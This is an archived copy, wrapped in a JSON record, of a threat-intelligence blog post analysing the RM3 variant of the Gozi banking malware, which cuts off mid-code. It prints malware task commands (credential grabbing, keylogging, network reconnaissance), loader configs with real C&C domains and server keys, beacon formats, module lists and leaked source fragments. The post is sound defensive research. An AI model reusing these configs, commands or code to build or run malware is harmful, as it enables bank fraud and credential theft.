{
	"id": "0a561553-b31c-4d35-aa9d-93a4cfbbc3b4",
	"created_at": "2026-04-06T01:29:54.602298Z",
	"updated_at": "2026-04-10T03:36:48.397142Z",
	"deleted_at": null,
	"sha1_hash": "2a6ddec1042a190564dae5c5d5fcbd5f120564c0",
	"title": "RM3 – Curiosities of the wildest banking malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1329880,
	"plain_text": "RM3 – Curiosities of the wildest banking malware\r\nBy riftsle\r\nPublished: 2021-05-04 · Archived: 2026-04-06 00:19:03 UTC\r\nfumik0_ \u0026 the RIFT Team\r\nTL:DR\r\nOur Research and Intelligence Fusion Team have been tracking the Gozi variant RM3 for close to 30 months. In\r\nthis post we provide some history, analysis and observations on this most pernicious family of banking malware\r\ntargeting Oceania, the UK, Germany and Italy. \r\nWe’ll start with an overview of its origins and current operations before providing a deep dive technical analysis\r\nof the RM3 variant. \r\nIntroduction\r\nDespite its long and rich history in the cyber-criminal underworld, the Gozi malware family is surrounded with\r\nmystery and confusion. The leaking of its source code only increased this confusion as it led to an influx\r\nof Gozi variants across the threat landscape.  \r\nAlthough most variants were only short-lived – they either disappeared or were taken down by law enforcement –\r\n a few have had greater staying power. \r\nSince September 2019, Fox-IT/NCC Group has intensified its research into known active Gozi variants. These\r\nare operated by a variety of threat actors (TAs) and generally cause financial losses by either direct involvement\r\nin transactional fraud, or by facilitating other types of malicious activity, such as targeted ransomware activity. \r\nGozi ISFB started targeting financial institutions around 2013-2015 and hasn’t stopped since then. It is one of the\r\nfew – perhaps the only – main active branches of the notorious 15 year old Gozi / CRM. Its popularity\r\nis probably due to the wide range of variants which are available and the way threat actor groups can use these for\r\ntheir own goals. 
\r\nIn 2017, yet another new version was detected in the wild with a number of major modifications compared to the previous main variant:\r\n- Rebranded RM loader (called RM3)\r\n- Used an exotic PE file format exclusively designed for this banking malware\r\n- Modular architecture\r\n- Network communication reworked\r\n- New modules\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 1 of 52\n\nGiven the complex development history of the Gozi ISFB forks, it is difficult to say with any certainty which variant was used as the basis for RM3. This is further complicated by the many different names used by the Cyber Threat Intelligence and Anti-Virus industries for this family of malware. But if you would like to understand the rather tortured history of this particular malware a little better, the research and blog posts on the subject by Check Point are a good starting point.\r\nBanking malware targeting mainly Europe \u0026 Oceania\r\nWith more than four years of activity, RM3 has had a significant impact on the financial fraud landscape by spreading a colossal number of campaigns, principally across two regions:\r\n- Oceania: to date, Australia and New Zealand are the most impacted countries in this region. Threat actors seemed to have significant experience and used traditional means to conduct fraud and theft, mainly using web injects to push fakes or replacers directly into financial websites. Some of these injectors are more advanced than the usual ones seen in bankers, and suggest the operators behind them were more sophisticated and experienced.\r\n- Europe: targeting primarily the UK, Germany and Italy. In this region, a manual fraud strategy was generally followed, which was drastically different to the approach seen in Oceania.\r\nTwo different approaches to fraud used in Europe and Oceania\r\nIt’s worth noting that ‘Elite’ in this context means highly skilled operators. 
The injects provided and the C\u0026C servers are by far the most complicated and restricted ones seen up to this date in the fraud landscape.\r\nFox-IT/NCC Group has currently counted at least eight* RM3 infrastructures:\r\n- 4 in Europe\r\n- 2 in Oceania (that seem to be linked together based on the fact that they share the same inject configurations)\r\n- 1 worldwide (using AES encryption)\r\n- 1 unknown\r\nLooking back, 2019 seems to have been a golden age (at least from the malware operators’ perspective), with five operators active at the same time. This golden age came to a sudden end with a sharp decline in 2020.\r\nRM3 timeline of active campaigns seen in the wild\r\nEven when some RM3 controllers were not delivering any new campaigns, they were still managing their bots by pushing occasional updates and inspecting them carefully. Then, after a number of weeks, they start performing fraud on the most interesting targets. This is an extremely common pattern among bank malware operators in our experience, although the reasons for this pattern remain unclear. It may be a tactic related to maintaining stealth, or it may simply be an indication of the operators lagging behind the sheer number of infections.\r\nThe global pandemic has had a noticeable impact on many types of RM3 infrastructure, as it has on all malware as a service (MaaS) operations. The widespread lockdowns as a result of the pandemic have resulted in a massive number of bots being shut down as companies closed and users were forced to work from home, in some cases using personal computers. This change in working patterns could be an explanation for what happened between Q1 \u0026 Q3 2020, when campaigns were drastically more aggressive than usual and bot infections intensified (and were also of lower quality, as if it was an emergency). 
The style of this operation differed drastically from the way in which RM3 operated between 2018 and 2019, when there was a partnership with a distributor actor called Sagrid.\r\nAnalysis of the separate campaigns reveals that individual campaign infrastructures are independent from each of the others and operate their own strategies:\r\nRM3 Infra | Tasks | Injects† (Financial) | Injects† (VNC) | Injects† (SOCKS)\r\nUK 1 | No‡ | Yes | Yes | Yes\r\nUK 2 | Yes | No | No | No\r\nItaly | No‡ | Yes | Yes | Yes\r\nAustralia/NZ 1 | Yes | Yes | No‡ | No\r\nAustralia/NZ 2 | Yes | Yes | No‡ | No\r\nRM3 .at | ??? | ??? | ??? | ???\r\nGermany | ??? | ??? | ??? | ???\r\nWorldwide | Yes | No | No | No\r\n† Based on the web inject configuration file from config.bin\r\n‡ Based on active campaign monitoring, threat actor team(s) are mainly inspecting bots to manually push extra commands like the VNC module for starting fraud activities.\r\nA robust and stable distribution routine\r\nAs with many malware processes, renewing bots is not a simple, linear thing and many elements have to be taken into consideration:\r\n- Malware signatures\r\n- Packer evading AV/EDR\r\n- Distribution used (ratio effectiveness)\r\n- Time of an active campaign before being taken down by abuse\r\nMany channels have been used to spread this malware, with distribution by spam (malspam) the most popular – and also the most effective. Multiple distribution teams are behind these campaigns and it is difficult to identify all of them; particularly so now, given the increased professionalisation of these operations (which now can involve shorter-term, contractor-like relationships). As a result, while malware campaign infrastructures are separate, there is now more overlap between the various infrastructures. It is certain however that one actor known as Sagrid was definitely the most prolific distributor. 
Around 2018/2019, Sagrid actively spread malware in Australia and New Zealand, using advanced techniques to deliver it to their victims.\r\nRM3 distribution over the past 4 years\r\nThe graphic below shows the distribution method of an individual piece of RM3 malware in more detail.\r\nA simplified path of a payload from its compilation to its delivery\r\nInterestingly, the only exploit kit seen to be involved in the distribution of RM3 has been Spelevo – at least in our experience. These days, Exploit Kits (EK) are not as active as in their golden era in the 2010s (when Angler EK dominated the market along with Rig and Magnitude). But they are still an interesting and effective technique for gathering bots from corporate networks, where updates are complicated and so can be delayed or just not performed. In other words, if a new bot is deployed using an EK, there is a higher chance that it is part of a big network than one distributed by a more ‘classic’ malspam campaign.\r\nStrangely, to this date, RM3 has never been observed targeting financial institutions in North America. Perhaps there are just no malicious actors who want to be part of this particular mule ecosystem in that zone. Or perhaps all the malicious actors in this region are still making enough money from older strains or another banking malware.\r\nNowadays, there is a steady decline in banking malware in general, with most TAs joining the rising and explosive ransomware trend. It is more lucrative for bank malware gangs to stop their usual business and try to get some exclusive contracts with the ransom teams. The return on investment (ROI) of a ransom paid by a victim is significantly higher than for the whole classic money mule infrastructure. 
The cost and time required in money mule and inject operations are much more complex than just giving access to an affiliate and awaiting royalties.\r\nLarge number of financial institutions targeted\r\nFox-IT/NCC Group has identified more than 130 financial institutions targeted by threat actor groups using this banking malware. As the table below shows, the scope and impact of these attacks is particularly concentrated on Oceania. This is also the only zone where loan and job websites are targeted. Of course, targeting job websites provides them with further opportunities to hire money mules more easily within their existing systems.\r\nCountry | Banks | Web Shops | Job Offers | Loans | Crypto Services\r\nUK | 28 | 1 | 0 | 0 | 0\r\nIT | 17 | 0 | 0 | 0 | 0\r\nAU/NZ | 80~ | 0 | 2 | 2 | 6\r\nA short timeline of post-pandemic changes\r\nAs we’ve already said, the pandemic has had an impact across the entire fraud landscape and forced many TAs (not just those using RM3) to drastically change their working methods. In some cases, they have shut down completely in one field and started doing something else. 
For RM3 TAs, as for all of us, these are indeed interesting times.\r\nQ3 2019 – Q2 2020, Classic fraud era\r\nBefore the pandemic, the tasks pushed by RM3 were pretty standard when a bot was part of the infrastructure. The example below is a basic check for a legitimate corporate bot with an open access point for a threat actor to connect to and start to use for fraud.\r\nGET_CREDS\r\nGET_SYSINFO\r\nLOAD_MODULE=mail.dll,UXA\r\nLOAD_KEYLOG=*\r\nLOAD_SOCKS=XXX.XXX.XXX.XXX:XXXX\r\nOtherwise, the banking malware was configured as an advanced infostealer, designed to steal data and intercept all keyboard interactions.\r\nGET_CREDS\r\nLOAD_MODULE=mail.dll,UXA\r\nLOAD_KEYLOG=*\r\nQ4 2020 – Now, Bot Harvesting Era\r\nNowadays, bots are basically removed if they are coming from old infrastructures and are not part of an active campaign. It’s an easy way for them to remove researcher bots.\r\nDEL_CONFIG\r\nOtherwise, this is a classic information-gathering operation on the host and network, which indicates TAs are following the ransomware path and winding down their fraud legacy step by step.\r\nGET_SYSINFO\r\nRUN_CMD=net group \"domain computers\" /domain\r\nRUN_CMD=net session\r\nRM3 Configs – Invaluable threat intelligence data\r\nRM3.AT\r\nAround the summer of 2019, when this banking malware was at its height, an infrastructure which was very different from the standard ones first emerged. It mostly used infostealers for distribution and pushed an interesting variant of the RM3 loader.\r\nBased on configs, similarities with the GoziAT TAs were seen. 
The crossovers were:\r\n- both infrastructures are using the .at TLD\r\n- subdomains and domains are using the same naming convention\r\n- the server ID is also different from the default one (12)\r\n- default nameservers config\r\n- first seen when GoziAT was curiously quiet\r\nAn example loader.ini file for RM3.at is shown below:\r\nLOADER.INI - RM3 .AT example\r\n{\r\n \"HOSTS\": [\r\n \"api.fiho.at\",\r\n \"t2.fiho.at\"\r\n ],\r\n \"NAMESERVERS\": [\r\n \"172.104.136.243\",\r\n \"8.8.4.4\",\r\n \"192.71.245.208\",\r\n \"51.15.98.97\",\r\n \"193.183.98.66\",\r\n \"8.8.8.8\"\r\n ],\r\n \"URI\": \"index.htm\",\r\n \"GROUP\": \"3000\",\r\n \"SERVER\": \"350\",\r\n \"SERVERKEY\": \"s2olwVg5cU7fWsec\",\r\n \"IDLEPERIOD\": \"10\",\r\n \"LOADPERIOD\": \"10\",\r\n \"HOSTKEEPTIMEOUT\": \"60\",\r\n \"DGATEMPLATE\": \"constitution.org/usdeclar.txt\",\r\n \"DGAZONES\": [\r\n \"com\",\r\n \"ru\",\r\n \"org\"\r\n ],\r\n \"DGATEMPHASH\": \"0x4eb7d2ca\",\r\n \"DGAPERIOD\": \"10\"\r\n}\r\nAs a reminder, the ISFB v2 variant called GoziAT (which technically uses the RM2 loader) uses the format shown below:\r\nLOADER.INI - GoziAT/ISFB (RM2 Loader)\r\n{\r\n \"HOSTS\": [\r\n \"api10.laptok.at/api1\",\r\n \"golang.feel500.at/api1\",\r\n \"go.in100k.at/api1\"\r\n ],\r\n \"GROUP\": \"1100\",\r\n \"SERVER\": \"730\",\r\n \"SERVERKEY\": \"F2oareSbPhCq2ch0\",\r\n \"IDLEPERIOD\": \"10\",\r\n \"LOADPERIOD\": \"20\",\r\n \"HOSTSHIFTTIMEOUT\": \"1\"\r\n}\r\nBut this RM3 infrastructure disappeared just a few weeks later and has never been seen again. 
It is not known if the TAs were satisfied with the product and its results, and it remains one of the unexplained curiosities of this banking malware. But we can say this marked the return of GoziAT, which was back on track with intense campaigns.\r\nOther domains related to this short-lived RM3 infrastructure were:\r\napi.fiho.at\r\ny1.rexa.at\r\ncde.frame303.at\r\napi.frame303.at\r\nu2.inmax.at\r\ncdn5.inmax.at\r\ngo.maso.at\r\nf1.maso.at\r\nStandard routine for other infrastructures\r\nMeanwhile, a classic loader config will mostly need standard data like any other malware:\r\n- C\u0026C domains (called hosts on the loader side)\r\n- Timeout values\r\n- Keys\r\nThe example below shows a typical loader.ini file from a more ‘classic’ infrastructure. This one is from Germany, but similar configurations were seen in the UK1, Australia/New Zealand1 and Italian infrastructures:\r\nLOADER.INI – DE\r\n{\r\n \"HOSTS\": \"https://daycareforyou.xyz\",\r\n \"ADNSONLY\": \"0\",\r\n \"URI\": \"index.htm\",\r\n \"GROUP\": \"40000\",\r\n \"SERVER\": \"12\",\r\n \"SERVERKEY\": \"z2Ptfc0edLyV4Qxo\",\r\n \"IDLEPERIOD\": \"10\",\r\n \"LOADPERIOD\": \"10\",\r\n \"HOSTKEEPTIMEOUT\": \"60\",\r\n \"DGATEMPLATE\": \"constitution.org/usdeclar.txt\",\r\n \"DGAZONES\": [\r\n \"com\",\r\n \"ru\",\r\n \"org\"\r\n ],\r\n \"DGATEMPHASH\": \"0x4eb7d2ca\",\r\n \"DGAPERIOD\": \"10\"\r\n}\r\nUpdates to RM3 were observed to be ongoing, and more fields have appeared since the 3009XX builds (e.g. 300912, 900932):\r\n- Configuring the self-removing process\r\n- Setting up the loader module as the persistent one\r\n- The Anti-CIS (langid field) is also making a comeback\r\nThe example below shows a typical client.ini file as seen in build 3009xx from the UK2 and Australia/New Zealand 2 infrastructures:\r\nCLIENT.INI\r\n{\r\n \"HOSTS\": \"https://vilecorbeanca.xyz\",\r\n \"ADNSONLY\": \"0\",\r\n \"URI\": \"index.htm\",\r\n \"GROUP\": \"92020291\",\r\n \"SERVER\": \"12\",\r\n \"SERVERKEY\": \"kD9eVTdi6lgpH0Ml\",\r\n \"IDLEPERIOD\": \"10\",\r\n \"LOADPERIOD\": \"10\",\r\n \"HOSTKEEPTIMEOUT\": \"60\",\r\n \"NOSCRIPT\": \"0\",\r\n \"NODELETE\": \"0\",\r\n \"NOPERSISTLOADER\": \"0\",\r\n \"LANGID\": \"RU\",\r\n \"DGATEMPLATE\": \"constitution.org/usdeclar.txt\",\r\n \"DGATEMPHASH\": \"0x4eb7d2ca\",\r\n \"DGAZONES\": [\r\n \"com\",\r\n \"ru\",\r\n \"org\"\r\n ],\r\n \"DGAPERIOD\": \"10\"\r\n}\r\nThe client.ini file mainly stores elements that will be required for the explorer.dll module:\r\n- Timeout values\r\n- Maximum size allowed for RM3 requests to the controllers\r\n- Video config\r\n- HTTP proxy activation\r\nCLIENT.INI - Default Format\r\n{\r\n \"CONTROLLER\": [\r\n \"\",\r\n ],\r\n \"ADNSONLY\": \"0\",\r\n \"IPRESOLVERS\": \"curlmyip.net\",\r\n \"SERVER\": \"12\",\r\n \"SERVERKEY\": \"\",\r\n \"IDLEPERIOD\": \"300\",\r\n \"TASKTIMEOUT\": \"300\",\r\n \"CONFIGTIMEOUT\": \"300\",\r\n \"INITIMEOUT\": \"300\",\r\n \"SENDTIMEOUT\": \"300\",\r\n \"GROUP\": \"\",\r\n \"HOSTKEEPTIMEOUT\": \"60\",\r\n \"HOSTSHIFTTIMEOUT\": \"60\",\r\n \"RUNCHECKTIMEOUT\": \"10\",\r\n \"REMOVECSP\": \"0\",\r\n \"LOGHTTP\": \"0\",\r\n \"CLEARCACHE\": \"1\",\r\n \"CACHECONTROL\": [\r\n \"no-cache,\",\r\n \"no-store,\",\r\n \"must-revalidate\"\r\n ],\r\n \"MAXPOSTLENGTH\": \"300000\",\r\n \"SETVIDEO\": [\r\n \"30,\",\r\n \"8,\",\r\n \"notipda\"\r\n ],\r\n \"HTTPCONNECTTIME\": \"480\",\r\n \"HTTPSENDTIME\": \"240\",\r\n \"HTTPRECEIVETIME\": \"240\"\r\n}\r\nWhat next?\r\nActive monitoring of current in-the-wild instances suggests that the RM3 TAs are progressively switching to the ransomware path. 
That is, they have not pushed any updates on the fraud side of their operations for a number of months (by not pushing any injects), but they are still maintaining their C\u0026C infrastructure. All infrastructure has a cost, and the fact that they are maintaining their C\u0026C infrastructure without executing traditional fraud is a strong indication they are changing their strategy to another source of income.\r\nThe tasks which are being pushed (and old ones since May 2020) are triage steps for selecting bots which could be used for internal lateral movement. This pattern of behaviour is becoming more evident every day in the latest ongoing campaigns, where everyone seems to be targeted and the inject configurations have been totally removed.\r\nAs a reminder, over the past two years banking malware gangs in general have been seen to follow this trend. This is due to the declining fraud ecosystem in general, but also due to the increased difficulty in finding inject developers with the skills to develop effective fakes, which this decline has also prompted.\r\nHow banking TAs can migrate from fraud to ransom (or any other businesses)\r\nWe consider RM3 to be the most advanced ISFB strain to date, and its fraud tools can easily be switched into a malicious red-team-like strategy.\r\nRM3 evolving to support two different use cases at the same time\r\nWhy is RM3 the most advanced ISFB strain?\r\nAs we said, we consider RM3 to be the most advanced ISFB variant we have seen. When we analyse the RM3 payload, there is a huge gap between it and its predecessors. 
There are multiple differences:\r\n- A new PE format called PX has been developed\r\n- The .bss section is slightly updated for storing RM3 static variables\r\n- A new structure called WD, based on the J1/J2/J3/JJ ISFB File Join system, for storing files\r\nArchitecture differences between ISFB v2 and RM3 payload\r\n(main sections discussed below)\r\nPX Format\r\nAs mentioned, RM3 is designed to work with PX payloads (Portable eXecutable). This is an exotic file format created for, and only used with, this banking malware. The structure is not very different from the original PE format, with almost all sections, data directories and section tables remaining intact. Essentially, use of the new file format just requires the malware to be re-crafted correctly into a new payload at the correct offset.\r\nPX Header\r\nBSS section\r\nThe bss section (Block Starting Symbol) is a critical data segment used by all strains of ISFB for storing uninitialised static local variables. These variables are encrypted and used for different interactions depending on the module in use.\r\nIn a compiled payload, this section is usually named “.bss0”. But evidence from a source code leak shows that this is originally named “.bss” in the source code. These comments also make it clear that this section is encrypted.\r\nThe encrypted .bss section\r\nThis is illustrated by the source code comments shown below:\r\n// Original section name that will be created within a file\r\n#define CS_SECTION_NAME \".bss0\"\r\n// The section will be renamed after the encryption completes.\r\n// This is because we cannot use reserved section names aka \".rdata\" or \".bss\" during compile time.\r\n#define CS_NEW_SECTION_NAME \".bss\"\r\nWhen working with ISFB, it is common to see the same mechanism or routine across multiple compiled builds or variants. 
However, it is still necessary to analyse them all in detail because slight adjustments are frequently introduced. Understanding these minor changes can help with troubleshooting and explain why scripts don’t work. The decryption routine in the bss section is a perfect example of this; it is almost identical to ISFB v2 variants, but the RM3 developers decided to tweak it just slightly by creating the XOR key in a different way – combining FILE_HEADER.TimeDateStamp with the gs_Cookie (this information is based on the ISFB leak).\r\nDecrypted strings from the .bss section being parsed by IDA\r\nOccasionally, it is possible to see a debug-compiled version of RM3 in the wild. It is unknown if this behaviour is intended for some reason or simply a mistake by TA teams, but it is a gold mine for understanding more about the underlying code.\r\nWD Struct\r\nISFB has its own way of storing and using embedded files. It uses a homemade structure that seems to change its name whenever there is a new strain or a major ISFB update:\r\n- FJ or J1 – Old ISFB era\r\n- J2 – Dreambot\r\n- J3 – ISFB v3 (only seen in Japan)\r\n- JJ – ISFB v2 (v2.14+ – now)\r\n- WD – RM3 / Saigon\r\nTo get a better understanding of the latest structure in use, it is worth taking a quick look back at the active strains of ISFB v2 still known to use the JJ system.\r\nThe structure is pretty rudimentary and can be summarised like this:\r\nstruct JJ_Struct {\r\n DWORD xor_cookie;\r\n DWORD crc32;\r\n DWORD size;\r\n DWORD addr;\r\n} JJ;\r\nWith RM3, they decided to slightly rework the join file philosophy by creating a new structure called WD. 
This is basically just a rebranded concept; it just adds the JJ structure (seen above) and stores it as a pointer array.\r\nThe structure itself is really simple:\r\nstruct WD_Struct {\r\n DWORD size;\r\n WORD magic;\r\n WORD flag;\r\n JJ_Struct *jj;\r\n} WD;\r\nIn all RM3 builds, these structures simply direct the malware to grab an average of at least 4 files†:\r\n- A PX loader\r\n- An RSA pubkey\r\n- An RM3 config\r\n- A wordlist that will be mainly used for creating subkeys in the registry\r\n† The number of files is dependent on the loader stage or RM3 modules used. It is also based on the ISFB variant, as another file could be present which stores the langid value (which is basically the anti-CIS feature for this banking malware).\r\nArchitecture\r\nEvery major ISFB variant has something that makes it unique in some way. For example, the notorious Dreambot was designed to work as a standalone payload; the whole loader stage walk-through was removed and bots were directly pointed at the correct controllers. This choice was mainly explained by the fact that this strain was designed to work as malware as a service. It is fairly standard right now to see malware developers developing specific features for TAs – if they are prepared to pay for them. In these agreements, TAs can be guaranteed some kind of exclusivity with a variant or feature. However, this business model does also increase the risk of misunderstanding and overlap in terms of assigning ownership and responsibility. This is one of the reasons it is harder to get a clear picture of the activities happening between malware developers \u0026 TAs nowadays.\r\nBut to get back to the variant we are discussing here; RM3 pushed the ISFB modular plugin system to its maximum potential by introducing a range of elements into new modules that had never been seen before. 
These new modules included:\r\n- bl.dll\r\n- explorer.dll\r\n- rt.dll\r\n- netwrk.dll\r\nThese modules are linked together to recreate a modded client32.bin/client64.bin (modded from the client.bin seen in ISFB v2). This new architecture is much more complicated to debug or disassemble. In the end, however, we can split this malware into 4 main branches:\r\n- A modded client32.bin/client64.bin\r\n- A browser module designed to set up hooks and an SSL proxy (used for POST HTTP/HTTPS interception)\r\n- A remote shell (probably designed for initial assessments before starting lateral attacks)\r\n- A fraud arsenal toolkit (hidden VNC, SOCKS proxy, etc.)\r\nRM3 Architecture\r\nRM3 Loader – Major ISFB update? Or just refactored code?\r\nThe loader is a minimalist plugin that contains only the required functions for doing three main tasks:\r\n- Contacting a loader C\u0026C (which is called the host), downloading critical RM3 modules and storing them in the registry (bl.dll, explorer.dll, rt.dll, netwrk.dll)\r\n- Setting up persistence†\r\n- Rebooting everything and making sure it has removed itself†\r\nAn overview of the second stage loader\r\nThese functions are summarised in the following schematic.‡\r\n† In the 3009XX builds mentioned above, a TA can decide to set up the loader as persistent itself, or remove the payload.\r\n‡ Of course, the loader has more details than could be mentioned here, but the schematic shows the main concepts for a basic understanding.\r\nRM3 Network beacons – Hiding the beast behind simple URIs\r\nC\u0026C beacon requests have been adjusted from the standard ISFB v2 ones, by simplifying the process with just two default URIs. These URIs are dynamic fields that can be configured from the loader and client config. 
This is something that older strains have started to follow since build 250172.\r\nWhen it switches to the controller side, RM3 saves HTTPS POST requests performed by the users. These are then used to create fake but legitimate-looking paths.\r\nChanging RM3 URI path dynamically\r\nThis ingenious trick makes RM3 really hard to catch behind the telemetry generated by the bot. In short, whenever the user is browsing websites performing those specific requests, the malware mimics them by replacing the domain with the controller one.\r\nhttps://\u003ccontroler_domain\u003e.tld/index.html \u003c- default\r\nhttps://\u003ccontroler_domain\u003e.tld/search/wp-content/app \u003c- timer cycle #1\r\nhttps://\u003ccontroler_domain\u003e.tld/search/wp-content/app\r\nhttps://\u003ccontroler_domain\u003e.tld/search/wp-content/app\r\nhttps://\u003ccontroler_domain\u003e.tld/search/wp-content/app\r\nhttps://\u003ccontroler_domain\u003e.tld/admin/credentials/home \u003c- timer cycle #2\r\nhttps://\u003ccontroler_domain\u003e.tld/admin/credentials/home\r\nhttps://\u003ccontroler_domain\u003e.tld/admin/credentials/home\r\nhttps://\u003ccontroler_domain\u003e.tld/admin/credentials/home\r\nhttps://\u003ccontroler_domain\u003e.tld/operating/static/template/index.php \u003c- timer cycle #3\r\nhttps://\u003ccontroler_domain\u003e.tld/operating/static/template/index.php\r\nhttps://\u003ccontroler_domain\u003e.tld/operating/static/template/index.php\r\nhttps://\u003ccontroler_domain\u003e.tld/operating/static/template/index.php\r\nIf that wasn’t enough, the usual base64 beacons are now hidden as a data form and sent by means of POST requests. 
When decrypted, these requests reveal this typical network communication.\r\nrandom=rdm\u0026type=1\u0026soft=3\u0026version=300960\u0026user=17fe7d78280730e52b545792f07d61cb\u0026group=21031\u0026id=00000024\r\nThe fields can be explained in as follows:\r\nField Meaning\r\nrandom A mandatory randomised value\r\ntype Data format\r\nsoft Network communication method\r\nversion Build of the RM3 banking malware\r\nuser User seed\r\ngroup Campaign ID\r\nid RM3 Data type\r\narc Module with specific architecture (0 =  i386 – 1= 86_x64)\r\nsize Stolen data size\r\nuptime Bot uptime\r\nsysid Machine seed\r\nos Windows version\r\nSoft – A curious ISFB Field\r\nValue Stage C\u0026C\r\nNetwork\r\nCommunication\r\nResponse Format\r\n(\u003c Build 300960)\r\nResponse\r\nFormat\r\n(Build 300960)\r\n3\r\nHost\r\n(Loader)\r\nWinAPI\r\nBase64(RSA +\r\nSerpent)\r\nBase64(RSA +\r\nAES)\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 19 of 52\n\nValue Stage C\u0026C\r\nNetwork\r\nCommunication\r\nResponse Format\r\n(\u003c Build 300960)\r\nResponse\r\nFormat\r\n(Build 300960)\r\n2\r\nHost\r\n(Loader)\r\nCOM\r\nBase64(RSA +\r\nSerpent)\r\nBase64(RSA +\r\nAES)\r\n1 Controller WinAPI/COM RSA + Serpent RSA + AES\r\nID – A field being updated RM3\r\nThanks to the source code leak, identifying the data type is not that complicated and can be determined from the\r\nfield “id”\r\nБот отправляет на сервер файлы следующего типа и формата (тип данных задаётся параметром t\r\nSEND_ID_UNKNOWN 0 - неизвестно, используется только для тестирования\r\nSEND_ID_FORM 1 - данные HTML-форм. ASCII-заголовок + форма бинарном виде, как есть\r\nSEND_ID_FILE 2 - любой файл, так шлются найденные по маске файлы\r\nSEND_ID_AUTH 3 - данные IE Basic Authentication, ASCII-заголовок + бинарные данные\r\nSEND_ID_CERTS 4 - сертификаты. Файлы PFX упакованые в CAB или ZIP.\r\nSEND_ID_COOKIES 5 - куки и SOL-файлы. Шлются со структурой каталогов. 
Упакованы в CAB ил\r\nSEND_ID_SYSINFO 6 - информация о системе. UTF8(16)-файл, упакованый в CAB или ZIP\r\nSEND_ID_SCRSHOT 7 - скриншот. GIF-файл.\r\nSEND_ID_LOG 8 - внутренний лог бота. TXT-файл.\r\nSEND_ID_FTP 9 - инфа с грабера FTP. TXT-файл.\r\nSEND_ID_IM 10 - инфа с грабера IM. TXT-файл.\r\nSEND_ID_KEYLOG 11 - лог клавиатуры. TXT-файл.\r\nSEND_ID_PAGE_REP 12 - нотификация о полной подмене страницы TXT-файл.\r\nSEND_ID_GRAB 13 - сграбленый фрагмент контента. ASCII заголовок + контент, как он есть\r\nOver time, they have created more fields:\r\nNew Command ID Description\r\nSEND_ID_CMD 19 Results from the CMD_RUN command\r\nSEND_ID_??? 20 –\r\nSEND_ID_CRASH 21 Crash dump\r\nSEND_ID_HTTP 22 Send HTTP Logs\r\nSEND_ID_ACC 23 Send credentials\r\nSEND_ID_ANTIVIRUS 24 Send Antivirus info\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 20 of 52\n\nModule list\r\nAnalysis indicates that any RM3 instance would have to include at least the following modules:\r\nCRC Module Name\r\nPE\r\nFormat\r\nStage Description\r\n– – MZ – 1st stage RM3 loader\r\n0xc535d8bf loader.dll PX – 2nd stage RM3 loader\r\n– – MZ –\r\nRM3 Startup module hidden\r\nin the shellcode\r\n0x8576b0d0 bl.dll PX Host RM3 Background Loader\r\n0x224c6c42 explorer.dll PX Host RM3 Mastermind\r\n0xd6306e08 rt.dll PX Host\r\nRM3 Runtime DLL – RM3\r\nWinAPI/COM Module\r\n0x45a0fcd0 netwrk.dll PX Host RM3 Network API\r\n0xe6954637 browser.dll PX Controller\r\nBrowser Grabber/HTTPS\r\nInterception\r\n0x5f92dac2 iexplore.dll PX Controller\r\nInternet explorer Hooking\r\nmodule\r\n0x309d98ff firefox.dll PX Controller Firefox Hooking module\r\n0x309d98ff microsoftedgecp.dll PX Controller\r\nMicrosoft Edge Hooking\r\nmodule (old one)\r\n0x9eff4536 chrome.dll PX Controller\r\nGoogle chrome Hooking\r\nmodule\r\n0x7b41e687 msedge.dll PX Controller\r\nMicrosoft Edge Hooking\r\nmodule (Chromium one)\r\n0x27ed1635 keylog.dll PX Controller Keylogging module\r\n0x6bb59728 mail.dll 
PX | Controller | Mail grabber module\r\n0x1c4f452a | vnc.dll | PX | Controller | VNC module\r\n0x970a7584 | sqlite.dll | PX | Controller | SQLite library required by some modules\r\n0xfe9c154b | ftp.dll | PX | Controller | FTP module\r\n0xd9839650 | socks.dll | PX | Controller | SOCKS module\r\n0x1f8fde6b | cmdshell.dll | PX | Controller | Persistent remote shell module\r\nAdditionally, several configuration files (.ini) store the critical settings RM3 runs with. Four different files are currently known:\r\nCRC | Name\r\n0x8fb1dde1 | loader.ini\r\n0x68c8691c | explorer.ini\r\n0xd722afcb | client.ini†\r\n0x68c8691c | vnc.ini\r\n† client.ini is never meant to be present in an RM3 binary: it is delivered by the loader C\u0026C (aka “the host”, after its field name in the configs). This is a clear break from older ISFB strains, where client.ini is embedded in client32.bin/client64.bin. The consequence is that if the loader C\u0026C is offline, there is no way to obtain this crucial file.\r\nMoving this file server-side is a clever move by the RM3 developers and the TAs using it, as it reduces the risk of researcher bots ending up in their ecosystem: a sample alone no longer yields the client configuration.\r\nRM3 dependency madness\r\nWith client32.bin (from the more standard ISFB v2 form) technically absent and replaced by an accumulation of modules injected into a process, RM3 is drastically different from its predecessors. 
It has totally reshaped its micro-ecosystem by forcing all of its modules to interact with each other (bl.dll excepted), as shown below.\r\nAll interactions between RM3 modules\r\nThese changes also slow down any in-depth analysis, since no module can be analysed in isolation any more.\r\nExternal calls from other RM3 modules (8576b0d0 and e6954637)\r\nRM3 Module 101\r\nThanks to the startup module launched by start.ps1 from the registry, a hidden shell worker is plugged into explorer.exe (the process, not the explorer.dll module) that sets up hooks on specific WinAPI/COM calls. These hooks let the banking malware inject all of its components into every child process spawned by that Windows process, which gives RM3 total control over all user interactions.\r\n(*) PoV = Point of View\r\nLooking at DllMain, the code hasn’t changed that much in the years since the ISFB leak:\r\nBOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)\r\n{\r\n    BOOL Ret = TRUE;\r\n    WINERROR Status = NO_ERROR;\r\n\r\n    if ( ul_reason_for_call ) {\r\n        // DLL_PROCESS_ATTACH (== 1): only the first attach runs the startup code\r\n        if ( ul_reason_for_call == DLL_PROCESS_ATTACH \u0026\u0026 _InterlockedIncrement(\u0026g_AttachCount) == 1 ) {\r\n            Status = ModuleStartup(hModule, lpReserved); // \u003c- main call\r\n            if ( Status != NO_ERROR ) {\r\n                SetLastError(Status);\r\n                Ret = FALSE;\r\n            }\r\n        }\r\n    }\r\n    else if ( !_InterlockedExchangeAdd(\u0026g_AttachCount, 0xFFFFFFFF) ) {\r\n        // 